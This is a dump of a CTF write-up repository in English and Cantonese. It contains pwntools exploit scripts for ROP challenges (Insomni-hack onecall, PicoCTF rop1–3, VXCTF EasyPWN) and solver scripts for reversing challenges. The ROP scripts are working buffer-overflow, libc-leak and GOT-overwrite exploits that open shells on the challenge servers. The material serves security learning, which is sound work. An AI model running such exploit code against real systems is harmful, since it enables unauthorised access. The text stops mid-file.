https://gist.github.com/cosine0/97151015512872a84ac164547410a9e0 25 | 26 | -------------------------------------------------------------------------------- /ROP/Insomni-hack teaser 2018 onecall/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | 4 | host = "onecall.teaser.insomnihack.ch" 5 | port = 1337 6 | #host="localhost" 7 | #port=169 8 | r = remote(host,port) 9 | 10 | a=r.recvuntil("\n") 11 | b=r.recvuntil("\n") 12 | c=r.recvuntil("\n") 13 | d=r.recvuntil("\n") 14 | e=r.recvuntil("\n") 15 | f=r.recvuntil("\n") 16 | g=r.recvuntil("\n") 17 | h=r.recvuntil("\n") 18 | i=r.recvuntil("\n") 19 | #ncat -ve ./run.sh -kl 169 20 | delim="r-xp 00000000 ca:01 256115 /home/onecall/chall/lib/libc.so.6" 21 | #delim="r-xp 00000000 08:01 1577167 /root/Desktop/CTF_Game/insomnihack2018/onecall_/lib/libc.so.6" 22 | #0000000051249000 16 23 | libc_base="a" 24 | if delim in a: 25 | libc_base= "0x"+a[:16] 26 | print a 27 | if delim in b: 28 | libc_base= "0x"+b[:16] 29 | print b 30 | if delim in c: 31 | libc_base= "0x"+c[:16] 32 | print c 33 | if delim in d: 34 | libc_base= "0x"+d[:16] 35 | print d 36 | if delim in e: 37 | libc_base= "0x"+e[:16] 38 | print e 39 | if delim in f: 40 | libc_base= "0x"+f[:16] 41 | print f 42 | if delim in g: 43 | libc_base= "0x"+g[:16] 44 | print g 45 | if delim in h: 46 | libc_base= "0x"+h[:16] 47 | print h 48 | if delim in i: 49 | libc_base= "0x"+i[:16] 50 | print i 51 | 52 | libc_base=int(libc_base,16) 53 | 54 | print "libc_base ="+hex(libc_base) 55 | 56 | r.recvuntil("?\n") 57 | pause() 58 | gadget=0x9b958 59 | 60 | 61 | one=libc_base+gadget 62 | 63 | puts=libc_base+0x000000000060D08 64 | sleep=libc_base+0x000000000009AB90 65 | map=0x4006c0 66 | print "onegadget : "+hex(one) 67 | print len(p64(one)) 68 | 69 | r.sendline(p64(one)) 70 | 71 | 72 | #r.sendline("ls") 73 | r.interactive() 74 | 75 | 76 | # [+] Opening connection to onecall.teaser.insomnihack.ch on port 1337: Done 77 | # 000000000b4d9000-000000000b607000 r-xp 00000000 ca:01 256115 /home/onecall/chall/lib/libc.so.6 78 | 79 | # libc_base =0xb4d9000 80 | # [*] Paused (press any to continue) 81 | # onegadget : 0xb574958 82 | # 8 83 | # [*] Switching to interactive mode 84 | # $ ls 85 | # flag.txt 86 | # lib 87 | # onecall 88 | # qemu-aarch64 89 | # run.sh 90 | # $ cat flag.txt 91 | # INS{did_you_gets_here_by_chance?} 92 | # $ 93 | 94 | -------------------------------------------------------------------------------- /ROP/PicoCTF_2013_ROP_1_4/rop1-fa6168f4d8eba0eb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/ROP/PicoCTF_2013_ROP_1_4/rop1-fa6168f4d8eba0eb -------------------------------------------------------------------------------- /ROP/PicoCTF_2013_ROP_1_4/rop1/readme.md: -------------------------------------------------------------------------------- 1 | Return to the un called function 2 | 3 | using IDA Pro->string mode to find the name of the function 4 | 5 | then info functions under GDB, 6 | 7 | Write 136 to fill the buffer,4 to fill the old ebp, ret address,done 8 | -------------------------------------------------------------------------------- /ROP/PicoCTF_2013_ROP_1_4/rop1/rop1.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | r=process('./rop1') 4 | 5 | not_called=0x080484a4 6 | 7 | payload='a'*140 8 | payload+=p32(not_called) 9 | 10 | print payload 11 | 12 | r.sendline(payload) 13 | 14 | r.sendline('ls') 15 | r.interactive() 16 | -------------------------------------------------------------------------------- /ROP/PicoCTF_2013_ROP_1_4/rop2-20f65dd0bcbe267d: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/ROP/PicoCTF_2013_ROP_1_4/rop2-20f65dd0bcbe267d -------------------------------------------------------------------------------- /ROP/PicoCTF_2013_ROP_1_4/rop2/readme.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | high 4 | ------------------------ 5 | | bin/sh | argument 6 | ------------------------ 7 | | AAAA | calling convention(pass an invalid return address to faciliate a call) 8 | ------------------------ 9 | | System | return to function 10 | ------------------------ 11 | | AAAA | overwrite old ebp 12 | ------------------------<------ebp 13 | | AAAAAAAAAAAAAAAAAAA| 14 | ------------------------ total 136 15 | | AAAAAAAAAAAAAAAAAAA| 16 | ------------------------ 17 | | AAAAAAAAAAAAAAAAAAA| 18 | ------------------------<------esp 19 | low 20 | 21 | 22 | 23 | write from low address to high address 24 | -------------------------------------------------------------------------------- /ROP/PicoCTF_2013_ROP_1_4/rop2/rop2.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | #bin/date=0x804861a 3 | #bin/bash=0x8049611 4 | #0xffffd682 ("bin/bash") 5 | bin_sh=0x8049610 # stack ("bin/sh") 6 | not_called=0x080484a4 7 | #0x08048541 : push edi ; push esi ; push ebx ; call 0x80485bb 8 | #0x08048542 : push esi ; push ebx ; call 0x80485ba 9 | 10 | r=process('./rop2') 11 | 12 | payload='a'*140 13 | 14 | #[padding] + [address of system] + [fake return address] + [addres /bin/bash] 15 | 16 | 17 | payload+=p32(0x80483a0) + 'aaaa' +p32(0x8049610) 18 | 19 | print payload 20 | 21 | r.sendline(payload) 22 | 23 | r.sendline('ls') 24 | r.interactive() 25 | -------------------------------------------------------------------------------- /ROP/PicoCTF_2013_ROP_1_4/rop3-7f3312fe43c46d26: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/ROP/PicoCTF_2013_ROP_1_4/rop3-7f3312fe43c46d26 -------------------------------------------------------------------------------- /ROP/PicoCTF_2013_ROP_1_4/rop3/readme.md: -------------------------------------------------------------------------------- 1 | 2 | Firstly,use IDA pro check string, nothing can use 3 | 4 | 5 | then gdb->crashoff-> A*140+ return address 6 | 7 | We used write to print out the address of library function 8 | 9 | then using debugger to check the offset 10 | 11 | For function in the PLT , they have fixed address during runtime, 12 | We just call the write(1,read,4) 13 | 14 | there is an vulnerable function here, and we set it to return address of calling write to exploit the address 15 | 16 | By using find /bin/sh <------- search /bin/sh first, then bin/sh EasyPWN1 7 | >Easiest pwn in the world! 8 | > 9 | >[bof](bof) 10 | 11 | 12 | 13 | 14 | 呢題係今次vxctg 嘅sanity check題, 15 | 16 | 17 | 首先ida左佢, 18 | 19 | 20 | ```C++ 21 | 22 | int __cdecl main(int argc, const char **argv, const char **envp) 23 | { 24 | be_nice_to_people(); 25 | vulnerable_function(); 26 | write(1, "Hello, World\n", 0xDuLL); 27 | return 0; 28 | } 29 | 30 | ``` 31 | 32 | 有個vulnerable_function(): 33 | 34 | ```C++ 35 | 36 | ssize_t vulnerable_function() 37 | { 38 | char buf; // [sp+0h] [bp-80h]@1 39 | 40 | return read(0, &buf, 256uLL); 41 | } 42 | 43 | ``` 44 | 45 | read buf 有bof 46 | 47 | Function list 有一個not_called() 48 | 49 | ```C++ 50 | 51 | int not_called() 52 | { 53 | return system("/bin/bash"); 54 | } 55 | ``` 56 | 57 | 只要將ret addr 指向呢個function 就get shell 58 | 59 | # Solution: 60 | 61 | [solve.py](solve.py) 62 | 63 | 64 | -------------------------------------------------------------------------------- /ROP/VXCTF 2nd EasyPWN/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | 4 | host = "124.244.16.209" 5 | port = 8001 6 | 7 | 8 | 9 | r = remote(host,port) 10 | 11 | vul=0x400626 12 | 13 | payload='A'*136 14 | 15 | payload+=p64(vul) 16 | 17 | 18 | r.sendline(payload) 19 | 20 | r.interactive() 21 | -------------------------------------------------------------------------------- /ROP/VXCTF 2nd EasyPWN2/bof2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/ROP/VXCTF 2nd EasyPWN2/bof2 -------------------------------------------------------------------------------- /ROP/VXCTF 2nd EasyPWN2/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/ROP/VXCTF 2nd EasyPWN2/libc.so.6 -------------------------------------------------------------------------------- /ROP/VXCTF 2nd EasyPWN2/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import base64 3 | import binascii 4 | 5 | host = "124.244.16.209" 6 | port = 8002 7 | #libc = ELF('libc.so.6') 8 | #/lib/x86_64-linux-gnu/libc-2.24.so 9 | 10 | libc = ELF('libc-2.24.so') 11 | 12 | #r = remote(host,port) 13 | 14 | r=process('./bof2') 15 | 16 | #sleep(20) 17 | 18 | def dump(i): 19 | 20 | r.recvuntil('Input:\n') 21 | r.sendline('1') 22 | 23 | r.recvuntil(']:\n') 24 | 25 | send=i*-1 26 | send/=8 27 | r.sendline(str(send)) 28 | 29 | 30 | addr=r.recvuntil('\n')[:-1] 31 | 32 | #print addr 33 | 34 | stri='0x' 35 | 36 | for i in range(len(addr)-1,-1,-1): 37 | temp=hex(ord(addr[i])) 38 | 39 | #print temp 40 | checker=int(temp,16) 41 | offset='' 42 | if(checker<0x10): 43 | offset+='0' 44 | 45 | 46 | temp=str(temp) 47 | 48 | temp=temp.split('x',1) 49 | 50 | stri+=offset 51 | stri+=temp[1] 52 | 53 | #print hex(ord(addr[i])) 54 | 55 | #print 'address of position '+str(send)+' '+stri 56 | dec=int(stri,16) 57 | hx=hex(dec) 58 | 59 | #print dec 60 | 61 | return hx 62 | 63 | 64 | 65 | 66 | write_c=dump(32) 67 | 68 | write_c=long(write_c,16) 69 | 70 | #.data:0000000000601060 message1 71 | #putchar:0000000000601018 off_601018 -72 putchar 72 | #exit 00601048 -24 73 | #scanf 0000000000601040 -32 74 | #off_601030 dq offset strchr 75 | #write 0000000000601020 -64 76 | #libc main 600FF0 -14 77 | 78 | one_time=0x04647c 79 | print write_c 80 | 81 | execc=0x0B8A7F 82 | 83 | 84 | libc_base=write_c-libc.symbols["scanf"] 85 | #exit as main 86 | #sys=0x4006db 87 | 88 | sys=libc_base+libc.symbols["system"] 89 | 90 | #sys=libc_base+execc 91 | 92 | r.recvuntil('Input:\n') 93 | r.sendline('2') 94 | r.recvuntil(']:\n') 95 | r.sendline('-6') 96 | r.recvuntil(']:\n') 97 | r.sendline(p64(sys)[:7]) 98 | 99 | r.recvuntil('Input:\n') 100 | r.sendline('2') 101 | r.recvuntil(']:\n') 102 | r.sendline('0') 103 | r.recvuntil(']:\n') 104 | payload='/bin/sh\x00' 105 | r.sendline(payload) 106 | 107 | #payload='find / -name flag' 108 | 109 | #r.sendline(payload) 110 | 111 | #payload='cat /home/bof2/flag' 112 | 113 | #r.sendline(payload) 114 | r.interactive() 115 | -------------------------------------------------------------------------------- /ROP/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Reverse/ASIS_2018_babyc/babyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/Reverse/ASIS_2018_babyc/babyc -------------------------------------------------------------------------------- /Reverse/ASIS_2018_babyc/babyc_1a00d836423d314578effc629e58fe3801851df8d9653d5da6a52d4da30ab993: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/Reverse/ASIS_2018_babyc/babyc_1a00d836423d314578effc629e58fe3801851df8d9653d5da6a52d4da30ab993 -------------------------------------------------------------------------------- /Reverse/ASIS_2018_babyc/cfg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/Reverse/ASIS_2018_babyc/cfg.png -------------------------------------------------------------------------------- /Reverse/ASIS_2018_babyc/patched_bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/Reverse/ASIS_2018_babyc/patched_bin -------------------------------------------------------------------------------- /Reverse/ASIS_2018_babyc/solve.py: -------------------------------------------------------------------------------- 1 | import angr 2 | proj = angr.Project('./patched_bin', auto_load_libs=False) 3 | target=[0x804a6fc] 4 | avoid=[0x804aa08] 5 | st = proj.factory.entry_state() 6 | 7 | for _ in xrange(31): 8 | k = st.posix.files[0].read_from(1) 9 | st.se.add(k != 0) 10 | st.se.add(k != 10) 11 | st.se.add(k>=0x20) 12 | st.se.add(k<=0x7e) 13 | 14 | #constraint last byte as "\n" 15 | k = st.posix.files[0].read_from(1) 16 | st.se.add(k == 10) 17 | 18 | 19 | #constraint size as 27 20 | st.posix.files[0].seek(0) 21 | st.posix.files[0].length = 32 22 | 23 | 24 | pg = proj.factory.path_group(st) 25 | pg.explore(find=target,avoid=avoid) 26 | 27 | print pg.found 28 | #Ah_m0vfu3c4t0r! 0y1ng:(@_ @4@ 29 | print pg.found[0].posix.dumps(0) 30 | #ASIS{574a1ebc69c34903a4631820f292d11fcd41b906} 31 | -------------------------------------------------------------------------------- /Reverse/Bamboofox 2017 little-asm/little-asm-221bc5c8651806d8a039d5ff2a68bc5c7d9e3a20: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/Reverse/Bamboofox 2017 little-asm/little-asm-221bc5c8651806d8a039d5ff2a68bc5c7d9e3a20 -------------------------------------------------------------------------------- /Reverse/Bamboofox 2017 little-asm/little-asm-impossible-9d4350fd9310c7bd83a1829825b0fd6491605f4c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/Reverse/Bamboofox 2017 little-asm/little-asm-impossible-9d4350fd9310c7bd83a1829825b0fd6491605f4c -------------------------------------------------------------------------------- /Reverse/Bamboofox 2017 little-asm/little-asm-revenge: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/Reverse/Bamboofox 2017 little-asm/little-asm-revenge -------------------------------------------------------------------------------- /Reverse/Bamboofox 2017 little-asm/little-asm.py: -------------------------------------------------------------------------------- 1 | #0x555555755020 : 0x939a93939e919d9e 0x8ee883a9ec85a784 2 | #0x555555755030 : 0x98ecec9b83bd8399 0xbdef8e8391e99d83 3 | #0x555555755040 : 0x00000000a1aeb998 0x0000000000000000 4 | 5 | #BAMBOOFOX{Y0u_4RE_a_G00D_A5M_R3aDer} 6 | table=[0x9e,0x9d,0x91,0x9e,0x93,0x93,0x9a,0x93,0x84,0xa7,0x85,0xec,0xa9,0x83,0xe8,0x8e, 7 | 0x99,0x83,0xbd,0x83,0x9b,0xec,0xec,0x98,0x83,0x9d,0xe9,0x91,0x83,0x8e,0xef,0xbd,0x98,0xb9,0xae,0xa1] 8 | 9 | 10 | xorr=0xdc 11 | 12 | print len(table) 13 | flag="" 14 | for i in range(len(table)): 15 | flag+=chr(table[i]^xorr) 16 | 17 | 18 | print flag 19 | -------------------------------------------------------------------------------- /Reverse/Bamboofox 2017 little-asm/little_asm_impossible.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | strr="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_!{}" 4 | flag="BAMBOOFOX{1_f1Nd_A_Lot_0f_juNk_FunCt10n}" 5 | for n in range(43): 6 | tmp=flag 7 | 8 | for i in range(len(strr)): 9 | 10 | t=tmp 11 | t+=strr[i] 12 | r=process("./little-asm-impossible-9d4350fd9310c7bd83a1829825b0fd6491605f4c") 13 | 14 | r.recvuntil(":\n") 15 | r.sendline(t) 16 | print "trying "+t 17 | ans=r.recv(20) 18 | 19 | #print ans 20 | 21 | if "W" in ans: 22 | print "flag : "+t 23 | flag=t 24 | break 25 | 26 | 27 | -------------------------------------------------------------------------------- /Reverse/Bamboofox 2017 little-asm/readme.md: -------------------------------------------------------------------------------- 1 | # Bamboofox 2017 little-asm 2 | 3 | 由於出題人無對input length 做checking 就直接開始validate flag, 所以bruteforce 到output 出woow 就可以了 4 | 5 | 6 | # Solution 7 | 8 | 改process名就可以通殺3題 9 | 10 | 11 | [Solve](little_asm_impossible.py) 12 | 13 | -------------------------------------------------------------------------------- /Reverse/CSAW 2017 rev 100 tablez/readme.md: -------------------------------------------------------------------------------- 1 | # CSAW 2017 rev 100 tablez 2 | 3 | # 題目: 4 | 5 | 6 | > tablEZ 7 | >Bobby was talking about tables a bunch, so I made some table stuff. I think this is what he was talking about... 8 | > 9 | >[tablez](tablez) 10 | 11 | 12 | 呢題係今次CTF嘅sanity check, 其實唔難 13 | 14 | IDA Pro main: 15 | 16 | ```C++ 17 | s[strlen(s) - 1] = 0; 18 | v6 = strlen(s); 19 | for ( i = 0LL; i < v6; ++i ) 20 | s[i] = get_tbl_entry((unsigned int)s[i]); 21 | if ( v6 == 37 ) 22 | { 23 | if ( !strncmp(s, s2, 0x26uLL) ) 24 | { 25 | puts("CORRECT <3"); 26 | result = 0; 27 | } 28 | ``` 29 | 題目就係入支flag落去,做transformation, 再同正確嘅flag transformation 對比 30 | 31 | transformation function: 32 | 33 | ```C++ 34 | __int64 __fastcall get_tbl_entry(char a1) 35 | { 36 | unsigned __int64 i; // [sp+Ch] [bp-8h]@1 37 | 38 | for ( i = 0LL; i <= 0xFE; ++i ) 39 | { 40 | if ( a1 == *((_BYTE *)&trans_tbl + 2 * i) ) 41 | return byte_201281[2 * i]; 42 | } 43 | return 0LL; 44 | } 45 | ``` 46 | 47 | 算法好簡單,只要將個byte table dump 出黎 就完成左part 1 48 | 49 | 之後係之前set breakpoint (0x9F7), 抄埋 rcx (正確嘅flag transformation ) 50 | 51 | strncmp assmebly: 52 | 53 | ```asm 54 | .text:00000000000009DE loc_9DE: ; CODE XREF: main+129j 55 | .text:00000000000009DE lea rcx, [rbp+s2] 56 | .text:00000000000009E5 lea rax, [rbp+s] 57 | .text:00000000000009EC mov edx, 26h ; n 58 | .text:00000000000009F1 mov rsi, rcx ; s2 59 | .text:00000000000009F4 mov rdi, rax ; s1 60 | .text:00000000000009F7 call _strncmp 61 | .text:00000000000009FC test eax, eax 62 | .text:00000000000009FE jnz short loc_A13 63 | .text:0000000000000A00 lea rdi, aCorrect3 ; "CORRECT <3" 64 | .text:0000000000000A07 call _puts 65 | .text:0000000000000A0C mov eax, 0 66 | .text:0000000000000A11 jmp short loc_A24 67 | ``` 68 | 69 | 有table+result之後,再python implement 1次佢個transfomation algorithm就可以 70 | 71 | 72 | 由於作者唔識打code同睇assembly,所以就求其打左個basic search,再返gdb人手check transformation result 73 | 74 | 75 | ``` 76 | flag:flag{t4ble_l00kups_ar3_b3tter_f0r_m3} 77 | 78 | ``` 79 | -------------------------------------------------------------------------------- /Reverse/CSAW 2017 rev 100 tablez/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | byte_table=[0x0BB,0x2,0x9B,0x3,0x0C4,0x4,0x6C,0x5,0x4A,0x6,0x2E,0x7,0x22, 4 | 0x8,0x45,0x9,0x33,0x0A,0x0B8,0x0B,0x0D5,0x0C,0x6,0x0D,0x0A, 5 | 0x0E,0x0BC,0x0F,0x0FA,0x10,0x79,0x11,0x24,0x12,0x0E1, 6 | 0x13,0x0B2,0x14,0x0BF,0x15,0x2C,0x16,0x0AD,0x17,0x86, 7 | 0x18,0x60,0x19,0x0A4,0x1A,0x0B6,0x1B,0x0D8,0x1C,0x59, 8 | 0x1D,0x87,0x1E,0x41,0x1F,0x94,0x20,0x77,0x21,0x0F0,0x22, 9 | 0x4F,0x23,0x0CB,0x24,0x61,0x2,0x25,0x26,0x0C0,0x27, 10 | 0x97,0x28,0x2A,0x29,0x5C,0x2A,0x8,0x2B,0x0C9,0x2C,0x9F, 11 | 0x2D,0x43,0x2E,0x4E,0x2F,0x0CF,0x30,0x0F9,0x31,0x3E, 12 | 0x32,0x6F,0x33,0x65,0x34,0x0E7,0x35,0x0C5,0x36,0x39, 13 | 0x37,0x0B7,0x38,0x0EF,0x39,0x0D0,0x3A,0x0C8,0x3B,0x2F, 14 | 0x3C,0x0AA,0x3D,0x0C7,0x3E,0x47,0x3F,0x3C,0x40,0x81, 15 | 0x41,0x32,0x42,0x49,0x43,0x0D3,0x44,0x0A6,0x45,0x96, 16 | 0x46,0x2B,0x47,0x58,0x48,0x40,0x49,0x0F1,0x4A,0x9C,0x4B, 17 | 0x0EE,0x4C,0x1A,0x4D,0x5B,0x4E,0x0C6,0x4F,0x0D6,0x50, 18 | 0x80,0x51,0x2D,0x52,0x6D,0x53,0x9A,0x54,0x3D,0x55,0x0A7, 19 | 0x56,0x93,0x57,0x84,0x58,0x0E0,0x59,0x12,0x5A,0x3B,0x5B, 20 | 0x0B9,0x5C,0x9,0x5D,0x69,0x5E,0x0BA,0x5F,0x99,0x60,0x48, 21 | 0x61,0x73,0x62,0x0B1,0x63,0x7C,0x64,0x82,0x65,0x0BE, 22 | 0x66,0x27,0x67,0x9D,0x68,0x0FB,0x69,0x67,0x6A,0x7E,0x6B, 23 | 0x0F4,0x6C,0x0B3,0x6D,0x5,0x6E,0x0C2,0x6F,0x5F,0x70,0x1B, 24 | 0x71,0x54,0x72,0x23,0x73,0x71,0x74,0x11,0x75,0x30,0x76, 25 | 0xD2,0x77,0x0A5,0x78,0x68,0x79,0x9E,0x7A,0x3F,0x7B, 26 | 0x0F5,0x7C,0x7A,0x7D,0x0CE,0x7E,0x0B,0x7F,0x0C,0x80, 27 | 0x85,0x81,0x0DE,0x82,0x63,0x83,0x5E,0x84,0x8E,0x85,0x0BD, 28 | 0x86,0x0FE,0x87,0x6A,0x88,0x0DA,0x89,0x26,0x8A,0x88, 29 | 0x8B,0x0E8,0x8C,0x0AC,0x8D,0x3,0x8E,0x62,0x8F,0x0A8,0x90, 30 | 0x0F6,0x91,0x0F7,0x92,0x75,0x93,0x6B,0x94,0x0C3,0x95, 31 | 0x46,0x96,0x51,0x97,0x0E6,0x98,0x8F,0x99,0x28,0x9A,0x76, 32 | 0x9B,0x5A,0x9C,0x91,0x9D,0x0EC,0x9E,0x1F,0x9F,0x44,0x0A0, 33 | 0x52,0x0A1,0x1,0x0A2,0x0FC,0x0A3,0x8B,0x0A4,0x3A,0x0A5, 34 | 0x0A1,0x0A6,0x0A3,0x0A7,0x16,0x0A8,0x10,0x0A9,0x14,0x0AA, 35 | 0x50,0x0AB,0x0CA,0x0AC,0x95,0x0AD,0x92,0x0AE,0x4B,0x0AF, 36 | 0x35,0x0B0,0x0E,0x0B1,0x0B5,0x0B2,0x20,0x0B3,0x1D,0x0B4, 37 | 0x5D,0x0B5,0x0C1,0x0B6,0x0E2,0x0B7,0x6E,0x0B8,0x0F,0x0B9, 38 | 0x0ED,0x0BA,0x90,0x0BB,0x0D4,0x0BC,0x0D9,0x0BD,0x42, 39 | 0x0BE,0x0DD,0x0BF,0x98,0x0C0,0x57,0x0C1,0x37,0x0C2,0x19, 40 | 0x0C3,0x78,0x0C4,0x56,0x0C5,0x0AF,0x0C6,0x74,0x0C7,0x0D1, 41 | 0x0C8,0x4,0x0C9,0x29,0x0CA,0x55,0x0CB,0x0E5,0x0CC,0x4C, 42 | 0x0CD,0x0A0,0x0CE,0x0F2,0x0CF,0x89,0x0D0,0x0DB,0x0D1, 43 | 0x0E4,0x0D2,0x38,0x0D3,0x83,0x0D4,0x0EA,0x0D5,0x17,0x0D6, 44 | 0x7,0x0D7,0x0DC,0x0D8,0x8C,0x0D9,0x8A,0x0DA,0x0B4,0x0DB, 45 | 0x7B,0x0DC,0x0E9,0x0DD,0x0FF,0x0DE,0x0EB,0x0DF,0x15, 46 | 0x0E0,0x0D,0x0E1,0x2,0x0E2,0x0A2,0x0E3,0x0F3,0x0E4,0x34, 47 | 0x0E5,0x0CC,0x0E6,0x18,0x0E7,0x0F8,0x0E8,0x13,0x0E9, 48 | 0x8D,0x0EA,0x7F,0x0EB,0x0AE,0x0EC,0x21,0x0ED,0x0E3,0x0EE, 49 | 0x0CD,0x0EF,0x4D,0x0F0,0x70,0x0F1,0x53,0x0F2,0x0FD,0x0F3, 50 | 0x0AB,0x0F4,0x72,0x0F5,0x64,0x0F6,0x1C,0x0F7,0x66,0x0F8, 51 | 0x0A9,0x0F9,0x0B0,0x0FA,0x1E,0x0FB,0x0D7,0x0FC,0x0DF, 52 | 0x0FD,0x36,0x0FE,0x7D,0x0FF] 53 | 54 | output=[39, 179, 115, 157, 245, 17, 231, 177, 55 | 179, 190, 153, 179, 249, 249, 244, 48, 56 | 27, 113, 153, 115, 35, 101, 153, 177, 57 | 101, 17, 17, 190, 35, 153, 39, 249, 58 | 35, 153, 5, 101, 206] 59 | 60 | print 'array size ='+str(len(byte_table)) 61 | 62 | print 'output size ='+str(len(output)) 63 | 64 | #flag{t4ble_l00kups_ar3_b3tter_f0r_m3} 65 | 66 | 67 | for i in range(len(output)): 68 | print str(i)+' th: ' 69 | for j in range(len(byte_table)): 70 | 71 | if byte_table[j]==output[i]: 72 | if byte_table[j-1]<126 and byte_table[j-1]>33: 73 | 74 | print chr(byte_table[j-1]) 75 | -------------------------------------------------------------------------------- /Reverse/CSAW 2017 rev 100 tablez/tablez: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/Reverse/CSAW 2017 rev 100 tablez/tablez -------------------------------------------------------------------------------- /Reverse/TUCTF_2017_Unknown/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Reverse/TUCTF_2017_Unknown/solve.py: -------------------------------------------------------------------------------- 1 | import gdb 2 | import time 3 | import random 4 | 5 | #elapsed_time :18147.596225500107 6 | #TUCTF{w3lc0m3_70_7uc7f_4nd_7h4nk_y0u_f0r_p4r71c1p471n6!} 7 | 8 | 9 | #p $eflags 10 | #hit [ PF ZF IF ] 11 | #fail [ IF ] 12 | continue_num=0 13 | start_time = time.time() 14 | gdb.execute("set pagination off") 15 | 16 | gdb.execute("b*0x0000000000401c84") 17 | charset_o = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_+*!{}" 18 | listflag = list("T"+'A'*55) #junk 19 | flag="" 20 | for i in range(0,56) : 21 | charset=''.join(random.sample(charset_o,len(charset_o))) 22 | 23 | for j in charset : 24 | listflag[i] = j 25 | gdb.execute('run '+''.join(listflag)) 26 | print("trying: "+j) 27 | 28 | tmp = continue_num 29 | while tmp > 0 : 30 | gdb.execute('c') 31 | tmp = tmp - 1 32 | b00l = gdb.execute('p $eflags',to_string = True) 33 | if len(b00l)>=17: 34 | continue_num+=1 35 | print("################Hit################ "+listflag[i]) 36 | elapsed_time = time.time() - start_time 37 | print("elapsed_time :"+str(elapsed_time)) 38 | flag+=listflag[i] 39 | print(flag) 40 | break 41 | else: 42 | continue 43 | 44 | 45 | #print the flag 46 | print(listflag) 47 | -------------------------------------------------------------------------------- /Reverse/UIUCTF_2018_Triptych/solve.py: -------------------------------------------------------------------------------- 1 | import r2pipe 2 | #flag{theres_three_of_em} 3 | def file_stream(c): 4 | fs=open("a.rr2","w") 5 | fs.write("#!/usr/bin/rarun2\n") 6 | fs.write("program=./triptych\n") 7 | fs.write("stdin=\"flag{"+c+"\""+"\n") 8 | fs.write("stdout=") 9 | fs.close() 10 | 11 | def table(c): 12 | file_stream(c) 13 | r2=r2pipe.open("./triptych") 14 | r2.cmd("e dbg.profile=a.rr2") 15 | r2.cmd("ood") 16 | r2.cmd("db 0x00400acd") 17 | r2.cmd("dc") 18 | r2.cmd("db 0x004009d7") 19 | r2.cmd("dc") 20 | r2.cmd("db 0x004008e1") 21 | r2.cmd("dc") 22 | r2.cmd("db 0x004007ce") 23 | r2.cmd("dc")#f 24 | r2.cmd("dc")#l 25 | r2.cmd("dc")#a 26 | r2.cmd("dc")#g 27 | r2.cmd("dc")#{ 28 | r2.cmd("dc") 29 | ret_c=r2.cmd("dr dl") 30 | ret_c=int(ret_c,16) 31 | return ret_c 32 | di={} 33 | for i in range(48,126): 34 | a=table(chr(i)) 35 | di[chr(a)]=chr(i) 36 | 37 | message="zmu}jnd{o{f_ndo{{_hz_{ga" 38 | flag="" 39 | for p in message: 40 | flag+=di[p] 41 | print flag 42 | 43 | print "flag is "+flag 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | #.text:0000000000400ACD call the_second 55 | #r2.cmd("db 0x00400acd") 56 | #r2.cmd("dc") 57 | #2nd 0x004009d7 58 | #3rd 0x004008e1 59 | #4th 0x004007ce 60 | 61 | #dl 62 | -------------------------------------------------------------------------------- /Reverse/UIUCTF_2018_Triptych/triptych: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/Reverse/UIUCTF_2018_Triptych/triptych -------------------------------------------------------------------------------- /Tools/SHA2017 asby -PE fuzzing/asby.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/Tools/SHA2017 asby -PE fuzzing/asby.exe -------------------------------------------------------------------------------- /Tools/SHA2017 asby -PE fuzzing/asby.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | 3 | def getp(): 4 | 